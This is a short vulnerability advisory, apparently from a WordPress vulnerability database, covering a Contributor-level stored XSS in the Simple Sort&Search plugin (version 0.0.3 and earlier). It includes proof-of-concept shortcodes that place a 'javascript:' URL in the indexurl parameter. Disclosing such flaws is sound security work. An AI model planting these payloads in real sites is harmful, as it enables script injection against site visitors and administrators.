WordPress Plugin Vulnerabilities
Simple Sort&Search <= 0.0.3 - Ccontributor+ Stored XSS
Description
The plugin does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor
Proof of Concept
As a contributor, add one of the shortcode below to a post or page, then view it and change the state of the input/s generated (such as tick a checkbox, or select a different option etc) to trigger the XSS [category_sims type="checkbox" indexurl="javascript:alert(origin)//"] [order_sims indexurl="javascript:alert(origin)//"] [orderby_sims indexurl="javascript:alert(origin)//"] [period_sims indexurl="javascript:alert(origin)//"] [tag_sims type="checkbox" indexurl="javascript:alert(origin)//"]
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-21 (about 2 years ago)
Added
2021-06-21 (about 2 years ago)
Last Updated
2021-06-25 (about 2 years ago)